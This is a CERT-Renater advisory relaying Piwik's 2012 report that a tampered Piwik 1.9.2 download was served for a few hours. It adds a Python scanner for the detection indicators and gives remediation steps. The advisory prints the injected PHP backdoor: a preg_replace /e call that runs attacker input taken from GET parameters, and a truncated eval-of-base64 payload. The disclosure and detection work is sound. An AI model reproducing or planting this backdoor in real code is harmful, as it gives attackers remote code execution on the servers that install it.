
====================================================================

                             CERT-Renater

                  Information Note No. 2012/VULN470
____________________________________________________________________

DATE                :  28/11/2012

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S) : Systems running Piwik versions 1.9.2 downloaded
                       on Nov 26th from 15:43 UTC to 23:59 UTC.

======================================================================
http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
______________________________________________________________________

Security Report: Piwik.org webserver hacked for a few hours on 2012 Nov 26th

Important Security Announcement: the Piwik.org webserver was compromised
by an attacker on 2012 Nov 26th. For a few hours, this attacker served a
Piwik 1.9.2 Zip file to which malicious code had been added.


How do I know if my Piwik server is safe?

You would be at risk only if you installed or updated to Piwik 1.9.2 on
Nov 26th from 15:43 UTC to 23:59 UTC.

If you are not using 1.9.2, or if you updated to 1.9.2 earlier than
Nov 26th 15:40 UTC or from Nov 27th onward, you should be safe.


How do I double check if my Piwik server is affected?

To check whether your Piwik is affected, open the file
piwik/core/Loader.php. A clean file looks like this, whereas a
compromised Loader.php would contain the following code at the end of
the file:

<?php Error_Reporting(0);
if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');
    exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

If you see this malicious code in your piwik/core/Loader.php file, read
below to fix this issue.
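As an added example (not part of the Piwik post or of this CERT advisory), the Python script below automates the check described above: it searches every PHP file under a Piwik tree, not only Loader.php, for the three indicators visible in the quoted snippet (the preg_replace call with the /e modifier, the lic.log marker-file test, and the eval(gzuncompress(base64_decode( packing). The sample files it scans are constructed here, with the base64 payload replaced by a placeholder.

```python
import re
import tempfile
from pathlib import Path

# (label, regex) pairs derived from the malicious snippet quoted above.
INDICATORS = [
    ("preg_replace with /e modifier", r"""preg_replace\(\s*["']/\(\.\+\)/e["']"""),
    ("eval(gzuncompress(base64_decode(", r"eval\(\s*gzuncompress\(\s*base64_decode\("),
    ("lic.log marker file check", r"""file_exists\(.*?["']/lic\.log["']\s*\)"""),
]

def loader_is_compromised(source: str) -> list[str]:
    """Return the labels of every indicator found in a PHP source string."""
    return [label for label, pattern in INDICATORS if re.search(pattern, source)]

def scan_piwik_tree(root: Path) -> dict[str, list[str]]:
    """Check every .php file under root (the attacker controlled the whole
    zip, so Loader.php need not be the only tampered file); map each
    relative path to the indicators found in it."""
    hits = {}
    for php in sorted(root.rglob("*.php")):
        found = loader_is_compromised(php.read_text(errors="replace"))
        if found:
            hits[php.relative_to(root).as_posix()] = found
    return hits

# Constructed samples: a stand-in for a clean Loader.php, and the quoted
# malicious tail with the base64 payload replaced by a placeholder.
CLEAN_LOADER = "<?php\nclass Piwik_Loader {\n    public static function load($c) {}\n}\n"
BAD_TAIL = (
    "<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {\n"
    "preg_replace(\"/(.+)/e\", $_GET['g'], 'dwm'); exit;\n}\n"
    "if (file_exists(dirname(__FILE__).\"/lic.log\")) exit;\n"
    "eval(gzuncompress(base64_decode('PAYLOAD_PLACEHOLDER')));\n"
)

def demo() -> dict[str, list[str]]:
    """Build a temporary piwik/ tree with one tampered file and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "piwik"
        (root / "core").mkdir(parents=True)
        (root / "core" / "Loader.php").write_text(CLEAN_LOADER + BAD_TAIL)
        (root / "index.php").write_text(CLEAN_LOADER)
        return scan_piwik_tree(root)

if __name__ == "__main__":
    for path, found in demo().items():
        print(f"{path}: {', '.join(found)}")
```

To check a real installation, call scan_piwik_tree(Path("/path/to/piwik")) instead of demo(); an empty result means none of the three indicators was found.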


How do I fix my Piwik if it is compromised?

If your Piwik is compromised, follow these steps:

    1. Back up piwik/config/config.ini.php.
    2. DELETE the piwik/ directory. It is important to DELETE the
       directory and all Piwik files, to ensure any malicious script
       is deleted as well.
    3. Download the latest Piwik from piwik.org.
    4. Unzip and upload the piwik/ directory to your server.
    5. Copy config.ini.php back into /piwik/config/.
    6. Go to Piwik; it should display the dashboard as expected.

You have now successfully restored Piwik to a clean version.

If you have other web software running in the same path on your server,
we would recommend, to be safe, restoring a backup of that other
software as well.


How did the attacker get into piwik.org?

The attacker used a security issue in a WordPress plugin we were using,
and gained partial access to the piwik.org server.


Is there a security bug in the Piwik software itself?

The website Piwik.org runs WordPress and was compromised because of a
security issue in a WordPress plugin. As far as we know, the Piwik
software itself does not have any exploitable security issue. We have a
security bug bounty program in place that rewards researchers for
finding security issues in the Piwik software and disclosing them to
us. We also document here how you can make your own Piwik data safer
and secure your server.


Has any sensitive data been leaked?

Piwik is a self-hosted, open source software. Piwik.org does not track
any web analytics data from any Piwik user. No personal or sensitive
data has been leaked since we do not track any.


What we are doing to prevent further issues

We are still working with our system administrators on the issue and
have some ideas to make this kind of problem much less likely to
occur. We will post a follow-up once these new mechanisms are in place.


Summary

We would like to thank the Piwik users who quickly reported this
problem (by email and in the forums). We received more than five
reports in a two-hour timeframe, which shows that the Piwik community
is very vigilant and ready to react to any problem.


We are truly sorry for the inconvenience. Please be sure that we will
do our best to keep Piwik (and Piwik.org) a safe place in the future.


Contact us at security@piwik.org if you need more info.

=========================================================
CERT-Renater reference server
https://services.renater.fr/ssi/
=========================================================
+ CERT-RENATER          | tel : 01-53-94-20-44          +
+ 23 - 25 Rue Daviel    | fax : 01-53-94-20-41          +
+ 75013 Paris           | email: certsvp@renater.fr     +
=========================================================
